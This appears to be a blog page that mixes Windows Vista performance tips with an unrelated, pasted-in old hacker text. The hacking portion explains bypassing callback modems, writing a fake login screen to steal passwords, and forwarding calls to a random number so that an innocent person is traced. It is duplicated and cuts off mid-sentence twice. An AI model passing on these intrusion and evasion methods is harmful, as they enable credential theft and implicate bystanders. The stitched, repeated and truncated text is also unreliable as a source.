________________________________________
TWEAK AERO BY DISABLING MIN/MAX ANIMATIONS
The new animations in Windows Vista look great for the first month or so but then they can become an annoyance since they feel like they increase the amount of time it takes to minimize and maximize a window. If you can live without the minimize and maximize animations that you can bring back the super fast feeling of your windows instantly disappearing and appearing by disabling the min/max animations.
Follow the steps below to make your windows faster:
1. Click on the Start Menu and key in SystemPropertiesPerformance and hit Enter.
2. On the Visual Effects tab uncheck Animate windows when minimizing and maximizing.
3. Click OK.
Other Steps:
1. Click on the desktop and select Personalize.
2. Select Windows Color and Appearance.
3. Uncheck Enable Transparency.
________________________________________
TWEAK INDEXING OPTIONS FOR PERFORMANCE BOOST
The indexing service in Windows Vista is responsible for making those search boxes all over the operating system lightening fast. By default Windows automatically indexes all files in your user profile folders, start menu and any files you have setup for offline access. If you have a lot of files in these locations and the files change often you can be putting a heavy load on the indexing service. For maximum performance when using Windows Vista I recommend disabling indexing for all other locations other than the Start Menu. This will lessen the background work that Windows Vista has to do. It will also slow down your searches of other locations but that is the price you must pay for this performance benefit.
Follow these steps to tweak the indexing locations:
Click on the Start Button and key in Indexing Options and hit Enter. Indexing Options will now load.
Vista tweak
* Hit the Modify button.
* Next, click on Show all locations.
* Scroll through the tree-view and uncheck any folders you do not want to be indexed. When you are finished, click OK.
* If you want to change advanced indexing settings such as what file types are indexed click on the Advanced button. Otherwise hit Close.
________________________________________
Speed up wireless WAN connection
In Windows Vista the networking components were designed to be much more intelligent and automatically adjust the network settings to optimize the connection speed. This is a great new feature. Your network components basically tweak themselves for optimal performance. In most situations, these components automatically adjust perfectly for best performance. However, with wireless WAN cards the detection of network conditions is flawed and can result in slower network performance.
To fix this problem, Microsoft has released a hotfix for users affected by this issue. If you have a Wireless WAN device, I suggest you give this hotfix a try.
KB 940646 details:
This problem occurs because of the way that TCP receive window auto tuning is used in Windows Vista for connections that only receive data.
This tweak will be automaticallly installed it you install Vista SP1.
Windows Vista obtains a round-trip time (RTT) estimate at the time of connection setup and every time that a new segment of data that is transmitted. A connection that only receives data is limited to the single RTT sample that is obtained at the time of connection setup. Because the connection only receives data, the connection cannot "converge" to the actual RTT of the connection. For example, because the RTT data may fluctuate for various reasons, a "converge" operation is performed to estimate a meaningful RTT by using blending current and previous RTT data. However, if the connection cannot converge to the actual RTT of the connection, the bandwidth delay product (BDP) estimate that Vista obtains is also incorrect. Therefore, the connection's receive window is limited, and throughput of the connected transmission network is reduced.
Hacking......
1) CALLBACK UNITS:
Callback units are a good security device, But with most phone systems,
it is quite possible for the hacker to use the following steps to get
around a callback unit that uses the same phone line for both incomming
and out going calls:First, he calls he callback unit and enters any
authorized ID code (this is not hard to get,as you'll see in a moment).
After he enters this ID, the hacker holds the phone line open - he does
not hang up. When the callback unit picks up the phone to call the user back,
the hacker is there, waiting to meet it.
The ID code as I said, is simple for a hacker to obtain, because these
codes are not meant to be security precautions.The callback unit itself
provides security by keeping incomming calls from reaching the computer.
The ID codes are no more private than most telephone numbers. Some callback
units refer to the codes as "location identification numbers," and some
locations are used by several different people,so their IDs are fairly
well known.I've been told that, in some cases,callback ubits also have
certain simple codes that are always defined by default. Once the hacker
has entered an ID code and the callback unit has picked up the phone to
re-call him,the hacker may or may not decide to provide a dial tone to
allow the unit to "think" it is calling the correct number. In any event,
the hacker will then turn on his computer, connect with the system - and
away he goes.If the however, the hacker has trouble holding the line with
method,he has an option: the intercept.
The Intercept:
Holding the line will only work with callback units that use the same
phone lines to call in and to call out.Some callback units use different
incoming and outgoing lines, numbers 555-3820 through 555-3830 are dedicated
to users' incoming calls, and lines 555-2020 through 555-2030 are dedicated
to the computers outgoing calls.The only thing a hacker needs in order to
get through to these systems is a computer and a little time - he doesn't
even need an ID code. First,the hacker calls any one of the outgoing phone
lines, which, of course, will not answer.Sooner or later, though, while the
hacker has his computer waiting there, listening to the ring, an authorized
user will call one of the incomming lines and request to be called back.
It will usually be less than an hours wait, but the hacker's computer
is perfectly capable of waiting for days, if need be.
The callback unit will take the code of the authorized user, hang up,
verify the code, and pick up the phone line to call back.If the unit
tries to call out on the line the hacker has dialed, the hacker has his
computer play a tone that sounds just like a dial tone.The computer will
then dial the number given that matches up with the user's authorized ID.
After that,the hacker can just connect his computer as he would in any
other case.If he is really serious,he will even decode the touch tones
that the mainframe dialed,figure out the phone number of the user the
system was calling, call the person, and make a few strange noises that
sound as though the computer called back but didnt work for some reason.
2) TRAPDOORS AS A POSSIBLILITY
I haven't heard of this happening, but i think it is possible that a
callback modem could have a trapdoor built into it.Callback modems are
run by software, which is written by programmers.An unscrupulous programmer
could find it very easy to slip in an unpublicized routine, such as,
"if code =*43*, then show all valid codes and phone numbers." And such a
routine, of course, would leave security wide open to anyone who found the
trapdoor.The obvious protection here, assuming the situation ever arises,
is simply an ethical manufactorer that checks its software thoroughly before
releasing it.
A trapdoor is a set of special instructions embedded in the large
program that is the operating system of a computer.A permanent,
hopefully secret "doorway", these special instructions enabe anyone who
knows about them to bypass normal security procedures and to gain access to
the computer's files.Although they may sound sinister, trapdoors were not
invented by hackers, although existing ones are certainly used by hackers
who find out about them.
3) THE DECOY
One of the more sophisticated hacking tools is known as the decoy, and it
comes in three versions.The first version requires that the hacker have an
account on the system in question. As in my case,the hacker has a
low-security account,and he tries this method to get higher-security
account.He will first use his low-security account to write a program that
will emulate the log-on procedures of the systems in questions.
This program will do the following:
*- Clear the terminal screen and place text on it that makes everything
look as if the system is in charge.
*- Prompt for, and allow the user to enter, both an account name and a password.
*- Save that information in a place the hacker can access.
*- Tell the use the account/password entries are not acceptable.
*- turn control of the terminal back over to the system.
The user will now assume that the account name or password was mistyped
and will try again...this time (scince the real operating system is in
control) with more success.You can see a diagram of the way these steps are
accomplished
___________________
| Clear Terminal |
| screen |
|____________________|
||
_________||_________
| Print Compuserve |
| Computer |
|_____ Network ______|
||
_________||_________
| Print "ENTER |
| PASSWORD" |______
|____________________| |
|| |
_________||_________ |
| PASSWORD ENTERED? |__NO__|
|____________________|
||_YES
_________||_________
| SAVE PASSWORD |
| INFORMATION |
|____________________|
||
_________||_________
| PRINT "LOGIN |
| INCORRECT |
|____________________|
||
_________||_________
| LOG OFF/RETURN |
| CONTROL TO |
| OPERATING SYSTEM |
|____________________|
4) CALL FORWARDING
Many people use call forwarding by special arrangement with the phone
company.When a customer requests call forwarding, the phone company uses
its computer to forward all the customers incomeing calls to another
number. Lets say, for example, that you want calls that come to your office
phone to be forwarded to your home phone: A call from you to the phone
company,some special settings in the phone companys computer, and all
calls to your office will ring at your home instead.This little bit of help
from the phone company is another tool used by hackers. Lets say you thought
that the computer you were hacking into was being watched-because the
sysop might have seen you and called the fed's and your sort of bugged by
this nagging feeling that they will trace the next hacker that calls,
just call the phone company and ask for call forwarding, pick a number,
(ANY NUMBER) out of the phone book and have your calls forwarded to that
number,Hea,Hea, the number you picked is the one that will be traced to,
not yours, so you could be hacking away,they think that they have traced you,
but actually the number you had your calls forwarded too. they enter chat mode
and say (YOUR BUSTED!!!!, WE'VE TRACED YOUR PHONE NUMER THE FEDS ARE ON THE
WAY!!), You could reply (Hea, SURE YA DID! I'D LIKE TO SEE YA TRY AND GET ME!
GO AHEAD!) ,that wont seem very important to them at the time, but it will
sure piss them off when they bust the wrong guy!
5) RAPID FIRE
Memory-location manipulation can be helpful, but there is another, more
powerful,possibility, in some cases: the Rapid-fire method.To understand how
this methos works, you have to know something about the way operationg
systems work.When a user enters a command, the operating system first places
the command in a holding area, a buffer, where it will sit for a few
millionths of a second.The system looks at the command and say's "Does this
person really have authorization to do this, or not?" Then, the command
sits there a few thousandths of a second while the system runs off to
check the user's authorization.When the system comes back to the command,
it will have one of two possible answers: "OK, GO AHEAD," or "SORRY,
GET PERMISSION FIRST."
Once you are on a system that handles things this way, you can
Callback units are a good security device, But with most phone systems,
it is quite possible for the hacker to use the following steps to get
around a callback unit that uses the same phone line for both incomming
and out going calls:First, he calls he callback unit and enters any
authorized ID code (this is not hard to get,as you'll see in a moment).
After he enters this ID, the hacker holds the phone line open - he does
not hang up. When the callback unit picks up the phone to call the user back,
the hacker is there, waiting to meet it.
The ID code as I said, is simple for a hacker to obtain, because these
codes are not meant to be security precautions.The callback unit itself
provides security by keeping incomming calls from reaching the computer.
The ID codes are no more private than most telephone numbers. Some callback
units refer to the codes as "location identification numbers," and some
locations are used by several different people,so their IDs are fairly
well known.I've been told that, in some cases,callback ubits also have
certain simple codes that are always defined by default. Once the hacker
has entered an ID code and the callback unit has picked up the phone to
re-call him,the hacker may or may not decide to provide a dial tone to
allow the unit to "think" it is calling the correct number. In any event,
the hacker will then turn on his computer, connect with the system - and
away he goes.If the however, the hacker has trouble holding the line with
method,he has an option: the intercept.
The Intercept:
Holding the line will only work with callback units that use the same
phone lines to call in and to call out.Some callback units use different
incoming and outgoing lines, numbers 555-3820 through 555-3830 are dedicated
to users' incoming calls, and lines 555-2020 through 555-2030 are dedicated
to the computers outgoing calls.The only thing a hacker needs in order to
get through to these systems is a computer and a little time - he doesn't
even need an ID code. First,the hacker calls any one of the outgoing phone
lines, which, of course, will not answer.Sooner or later, though, while the
hacker has his computer waiting there, listening to the ring, an authorized
user will call one of the incomming lines and request to be called back.
It will usually be less than an hours wait, but the hacker's computer
is perfectly capable of waiting for days, if need be.
The callback unit will take the code of the authorized user, hang up,
verify the code, and pick up the phone line to call back.If the unit
tries to call out on the line the hacker has dialed, the hacker has his
computer play a tone that sounds just like a dial tone.The computer will
then dial the number given that matches up with the user's authorized ID.
After that,the hacker can just connect his computer as he would in any
other case.If he is really serious,he will even decode the touch tones
that the mainframe dialed,figure out the phone number of the user the
system was calling, call the person, and make a few strange noises that
sound as though the computer called back but didnt work for some reason.
2) TRAPDOORS AS A POSSIBLILITY
I haven't heard of this happening, but i think it is possible that a
callback modem could have a trapdoor built into it.Callback modems are
run by software, which is written by programmers.An unscrupulous programmer
could find it very easy to slip in an unpublicized routine, such as,
"if code =*43*, then show all valid codes and phone numbers." And such a
routine, of course, would leave security wide open to anyone who found the
trapdoor.The obvious protection here, assuming the situation ever arises,
is simply an ethical manufactorer that checks its software thoroughly before
releasing it.
A trapdoor is a set of special instructions embedded in the large
program that is the operating system of a computer.A permanent,
hopefully secret "doorway", these special instructions enabe anyone who
knows about them to bypass normal security procedures and to gain access to
the computer's files.Although they may sound sinister, trapdoors were not
invented by hackers, although existing ones are certainly used by hackers
who find out about them.
3) THE DECOY
One of the more sophisticated hacking tools is known as the decoy, and it
comes in three versions.The first version requires that the hacker have an
account on the system in question. As in my case,the hacker has a
low-security account,and he tries this method to get higher-security
account.He will first use his low-security account to write a program that
will emulate the log-on procedures of the systems in questions.
This program will do the following:
*- Clear the terminal screen and place text on it that makes everything
look as if the system is in charge.
*- Prompt for, and allow the user to enter, both an account name and a password.
*- Save that information in a place the hacker can access.
*- Tell the use the account/password entries are not acceptable.
*- turn control of the terminal back over to the system.
The user will now assume that the account name or password was mistyped
and will try again...this time (scince the real operating system is in
control) with more success.You can see a diagram of the way these steps are
accomplished
___________________
| Clear Terminal |
| screen |
|____________________|
||
_________||_________
| Print Compuserve |
| Computer |
|_____ Network ______|
||
_________||_________
| Print "ENTER |
| PASSWORD" |______
|____________________| |
|| |
_________||_________ |
| PASSWORD ENTERED? |__NO__|
|____________________|
||_YES
_________||_________
| SAVE PASSWORD |
| INFORMATION |
|____________________|
||
_________||_________
| PRINT "LOGIN |
| INCORRECT |
|____________________|
||
_________||_________
| LOG OFF/RETURN |
| CONTROL TO |
| OPERATING SYSTEM |
|____________________|
4) CALL FORWARDING
Many people use call forwarding by special arrangement with the phone
company.When a customer requests call forwarding, the phone company uses
its computer to forward all the customers incomeing calls to another
number. Lets say, for example, that you want calls that come to your office
phone to be forwarded to your home phone: A call from you to the phone
company,some special settings in the phone companys computer, and all
calls to your office will ring at your home instead.This little bit of help
from the phone company is another tool used by hackers. Lets say you thought
that the computer you were hacking into was being watched-because the
sysop might have seen you and called the fed's and your sort of bugged by
this nagging feeling that they will trace the next hacker that calls,
just call the phone company and ask for call forwarding, pick a number,
(ANY NUMBER) out of the phone book and have your calls forwarded to that
number,Hea,Hea, the number you picked is the one that will be traced to,
not yours, so you could be hacking away,they think that they have traced you,
but actually the number you had your calls forwarded too. they enter chat mode
and say (YOUR BUSTED!!!!, WE'VE TRACED YOUR PHONE NUMER THE FEDS ARE ON THE
WAY!!), You could reply (Hea, SURE YA DID! I'D LIKE TO SEE YA TRY AND GET ME!
GO AHEAD!) ,that wont seem very important to them at the time, but it will
sure piss them off when they bust the wrong guy!
5) RAPID FIRE
Memory-location manipulation can be helpful, but there is another, more
powerful,possibility, in some cases: the Rapid-fire method.To understand how
this methos works, you have to know something about the way operationg
systems work.When a user enters a command, the operating system first places
the command in a holding area, a buffer, where it will sit for a few
millionths of a second.The system looks at the command and say's "Does this
person really have authorization to do this, or not?" Then, the command
sits there a few thousandths of a second while the system runs off to
check the user's authorization.When the system comes back to the command,
it will have one of two possible answers: "OK, GO AHEAD," or "SORRY,
GET PERMISSION FIRST."
Once you are on a system that handles things this way, you can
Subscribe to:
Comments (Atom)